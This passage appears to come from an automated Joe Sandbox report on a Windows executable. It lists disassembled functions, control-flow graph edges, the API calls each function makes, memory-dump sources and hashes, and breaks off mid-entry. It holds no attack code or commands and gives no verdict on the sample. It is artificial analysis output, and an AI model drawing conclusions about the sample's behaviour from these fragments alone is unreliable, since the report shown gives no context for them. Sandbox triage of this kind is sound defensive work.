                                                                                                                                                                                                                                  • API String ID: 2150560229-0
                                                                                                                                                                                                                                  • Opcode ID: 1fb8b41ab4bbba739c5773e596e3cc2a0bcea10c2fead9cf607a222727754f86
                                                                                                                                                                                                                                  • Instruction ID: 58f48c72c37b781a90bedaf757ab961229e36f997f71df973f066180f3ff0e7c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fb8b41ab4bbba739c5773e596e3cc2a0bcea10c2fead9cf607a222727754f86
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0E09BA6E5470282FB189F31F82637953616F98F96F484034CD4F46750EF3DA1959608
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D4050 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 195 7ff6385d4050-7ff6385d4081 196 7ff6385d413f-7ff6385d415c GlobalMemoryStatusEx 195->196 197 7ff6385d4087-7ff6385d40a2 GetCurrentProcess call 7ff63862a7ad 195->197 199 7ff6385d41e2-7ff6385d41e5 196->199 200 7ff6385d4162-7ff6385d4165 196->200 197->196 210 7ff6385d40a8-7ff6385d40b0 197->210 201 7ff6385d41ee-7ff6385d41f1 199->201 202 7ff6385d41e7-7ff6385d41eb 199->202 204 7ff6385d41d1-7ff6385d41d4 200->204 205 7ff6385d4167-7ff6385d4172 200->205 208 7ff6385d41f3-7ff6385d41f8 201->208 209 7ff6385d41fb-7ff6385d41fe 201->209 202->201 206 7ff6385d41d6 204->206 207 7ff6385d41d9-7ff6385d41dc 204->207 211 7ff6385d4174-7ff6385d4179 205->211 212 7ff6385d417b-7ff6385d418c 205->212 206->207 214 7ff6385d41de-7ff6385d41e0 207->214 215 7ff6385d4208-7ff6385d422b call 7ff63862abf0 207->215 208->209 209->215 216 7ff6385d4200 209->216 217 7ff6385d40b2-7ff6385d40b8 210->217 218 7ff6385d411a-7ff6385d411f 210->218 213 7ff6385d4190-7ff6385d41a1 211->213 212->213 220 7ff6385d41a3-7ff6385d41a8 213->220 221 7ff6385d41aa-7ff6385d41be 213->221 224 7ff6385d4205 214->224 216->224 225 7ff6385d40c1-7ff6385d40d5 217->225 226 7ff6385d40ba-7ff6385d40bf 217->226 222 7ff6385d4131-7ff6385d4134 218->222 223 7ff6385d4121-7ff6385d4124 218->223 229 7ff6385d41c2-7ff6385d41ce 220->229 221->229 222->215 232 7ff6385d413a 222->232 230 7ff6385d412b-7ff6385d412e 223->230 231 7ff6385d4126-7ff6385d4129 223->231 224->215 227 7ff6385d40d9-7ff6385d40ea 225->227 226->227 233 7ff6385d40f3-7ff6385d4107 227->233 234 7ff6385d40ec-7ff6385d40f1 227->234 229->204 230->222 231->222 232->224 235 7ff6385d410b-7ff6385d4117 233->235 234->235 235->218
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentGlobalMemoryProcessStatus
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 3261791682-2766056989
                                                                                                                                                                                                                                  • Opcode ID: dc1f454300948641d3d60aa85f265a4ce21df8e8954a62b4408c22d6989b7564
                                                                                                                                                                                                                                  • Instruction ID: cc0d8ed8ff148bf295c84a0b697ece973bd9c162e26c93d4bc3982088af65dab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc1f454300948641d3d60aa85f265a4ce21df8e8954a62b4408c22d6989b7564
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B415923B09B4641F996CB7691103B9D2927F59BD1F18C331DD0EA6B44FF3EE185A604
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF638602160 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF6386021A0
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF638602216
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF63860226B
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF6385F0719,?,?,?,?,00000000,00007FF6385E94DF), ref: 00007FF638602291
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                  • Opcode ID: 079e50680ba0851a1e5311ed09f4e745be475b330cea89eadfc2402106436220
                                                                                                                                                                                                                                  • Instruction ID: 8ef09f34ca1c0e3eac18cc3cc1c622dfca95829e4bccfc91c721212fdaf5c987
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 079e50680ba0851a1e5311ed09f4e745be475b330cea89eadfc2402106436220
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48319AA3D0C66680FA629B71E8013F92390FF16340F490432DA6E82391DE7FE549B31C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385DEA40 Relevance: 4.7, APIs: 3, Instructions: 195threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 296 7ff6385dea40-7ff6385dea6d 297 7ff6385dea6f 296->297 298 7ff6385dea76-7ff6385dea7e 297->298 299 7ff6385dea80-7ff6385dea8a call 7ff638602510 298->299 300 7ff6385dea8c-7ff6385deaac 298->300 299->297 302 7ff6385deba3-7ff6385deba9 300->302 303 7ff6385deab2-7ff6385deab8 300->303 307 7ff6385debab-7ff6385debb1 call 7ff6385e6680 302->307 308 7ff6385debb6-7ff6385debb9 302->308 305 7ff6385deabe 303->305 306 7ff6385deb8d-7ff6385deb98 303->306 310 7ff6385deac0-7ff6385deac6 305->310 306->303 309 7ff6385deb9e 306->309 307->308 312 7ff6385debbf-7ff6385debc6 308->312 313 7ff6385dec7a-7ff6385dec84 call 7ff6385f6d90 308->313 309->302 315 7ff6385deb32-7ff6385deb42 call 7ff6385cace0 310->315 316 7ff6385deac8-7ff6385dead0 310->316 317 7ff6385dec71-7ff6385dec78 312->317 318 7ff6385debcc-7ff6385debd4 312->318 326 7ff6385decec-7ff6385decef 313->326 327 7ff6385dec86-7ff6385dec8c 313->327 337 7ff6385deb44-7ff6385deb4b 315->337 338 7ff6385deb66-7ff6385deb6e 315->338 316->315 323 7ff6385dead2-7ff6385dead9 316->323 317->313 320 7ff6385dec22-7ff6385dec36 call 7ff6385df2a0 317->320 318->317 319 7ff6385debda-7ff6385dec04 318->319 319->317 324 7ff6385dec06-7ff6385dec1d call 7ff6386003e0 319->324 332 7ff6385dec3b-7ff6385dec45 320->332 329 7ff6385deadb-7ff6385deae8 323->329 330 7ff6385deb29-7ff6385deb30 SwitchToThread 323->330 324->320 326->320 334 7ff6385decf5-7ff6385ded0d call 7ff6385ded20 326->334 335 7ff6385dec8e-7ff6385dec91 327->335 336 7ff6385dec9d-7ff6385decad call 7ff638602350 327->336 339 7ff6385deaea 329->339 340 7ff6385deb08-7ff6385deb0c 329->340 333 7ff6385deb83-7ff6385deb87 330->333 332->298 346 7ff6385dec4b-7ff6385dec70 332->346 333->306 333->310 334->332 335->336 348 7ff6385dec93-7ff6385dec98 call 7ff6385e6680 335->348 360 7ff6385decaf-7ff6385decb9 call 7ff6385f6d90 336->360 361 7ff6385decbb-7ff6385decc1 336->361 349 7ff6385deb4d-7ff6385deb53 337->349 350 7ff6385deb5c-7ff6385deb61 call 7ff6385d4930 337->350 343 7ff6385deb70-7ff6385deb75 call 7ff638602510 338->343 344 7ff6385deb7a-7ff6385deb7c 338->344 342 7ff6385deaf0-7ff6385deaf4 339->342 340->333 345 7ff6385deb0e-7ff6385deb16 340->345 342->340 353 7ff6385deaf6-7ff6385deafe 342->353 343->344 344->333 355 7ff6385deb7e call 7ff6385cac80 344->355 345->333 356 7ff6385deb18-7ff6385deb27 call 7ff6385cace0 SwitchToThread 345->356 348->336 349->350 359 7ff6385deb55-7ff6385deb5a SwitchToThread 349->359 350->338 353->340 362 7ff6385deb00-7ff6385deb06 353->362 355->333 356->344 359->338 360->326 360->361 366 7ff6385decc3-7ff6385decc6 361->366 367 7ff6385deccc-7ff6385dece7 call 7ff6386003e0 361->367 362->340 362->342 366->320 366->367 367->326
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: SwitchThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 115865932-0
                                                                                                                                                                                                                                  • Opcode ID: fef911a86f66959ba79e38f672759938756ad5d8c866ac1d6c88773165e8c7d1
                                                                                                                                                                                                                                  • Instruction ID: 81e44cecbbc9cf210d993d96db810df2c4cb00234cf11f476ff98b3fe59c6284
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef911a86f66959ba79e38f672759938756ad5d8c866ac1d6c88773165e8c7d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80715C23E4C24386FAA59B75A8406F52691BF407A4F040139ED5ED63E6DF3EF849B60C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D4980 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF6385D7258,?,?,0000000A,00007FF6385D6290,?,?,00000000,00007FF6385CD511), ref: 00007FF6385D49A7
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF6385D7258,?,?,0000000A,00007FF6385D6290,?,?,00000000,00007FF6385CD511), ref: 00007FF6385D49C7
                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32 ref: 00007FF6385D49E8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual$CurrentNumaProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 647533253-0
                                                                                                                                                                                                                                  • Opcode ID: 0f79e1f9fb7c57a5804dcfbebd53963d97870895eb137765fd9f2b0d5a21cff4
                                                                                                                                                                                                                                  • Instruction ID: 96f70048b6f4d95fe2929e03cecfb7fe2c68c25cb86cfde656cf876472740ec5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f79e1f9fb7c57a5804dcfbebd53963d97870895eb137765fd9f2b0d5a21cff4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F0A472B1869182EB208B26F400259A7A1BB49BD5F444138EF9C57B58DF3DD6819704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF63862AC10 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 205171174-0
                                                                                                                                                                                                                                  • Opcode ID: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
                                                                                                                                                                                                                                  • Instruction ID: 00dcf96cd5ca98bee78f34c2dc629f5f4dbc8776773c6bfc8f78fa39c421bfb2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEE04652F0922746F918367268562F400408F4B771F2C2BB0DE3E857C2AE9EA492B20C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D1E00 Relevance: 2.6, APIs: 2, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 3b9ba5bb325a68822b89214c34cfabdef69cd089529d7cc14825447244418785
                                                                                                                                                                                                                                  • Instruction ID: 289c55ad1ed8bfdfe33617eb297be23b2aa78e5a7dee24eed3c96b2d2ccf0904
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b9ba5bb325a68822b89214c34cfabdef69cd089529d7cc14825447244418785
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31F133B05B5282EA54CB26E5001AAA7A0FF49FE4F448135DF4C87B85DF3DD4A29388
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D4940 Relevance: 2.5, APIs: 2, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: bf4246efc00b83af4bfd495cfe47a35108a4604470746a3adb86311942c8986d
                                                                                                                                                                                                                                  • Instruction ID: 709dc748c273b1372e716593ff67d9d978c1e1b21519e795342a1a830b9bb51e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf4246efc00b83af4bfd495cfe47a35108a4604470746a3adb86311942c8986d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18E0CD25F1510182FB989733A84265512927F59701FC08038C40E83351DE2E755A9B14
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6385D94CE Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1326985565.00007FF6385C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327261799.00007FF638782000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327583023.00007FF6388CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327761648.00007FF6388CF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327794330.00007FF6388E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1327865826.00007FF6388E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6385c0000_file.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                  • Opcode ID: 0ea7ae459f610f3fad0c70b7da49c45737172eb66abf2fe226c336cc78108b37
                                                                                                                                                                                                                                  • Instruction ID: 6db1c418039ca80a235171252ea952e79968522b46dddac9a4bb8fb0106dafbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ea7ae459f610f3fad0c70b7da49c45737172eb66abf2fe226c336cc78108b37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF419163F0968282FA908B3194415F52395EF95BB4F440232DE6EA37C9DF3EE545E704
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00007FF6386C5070 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF6386C4FCE), ref: 00007FF6386C50C2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1327073451.00007FF6385C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6385C0000, based on PE: true
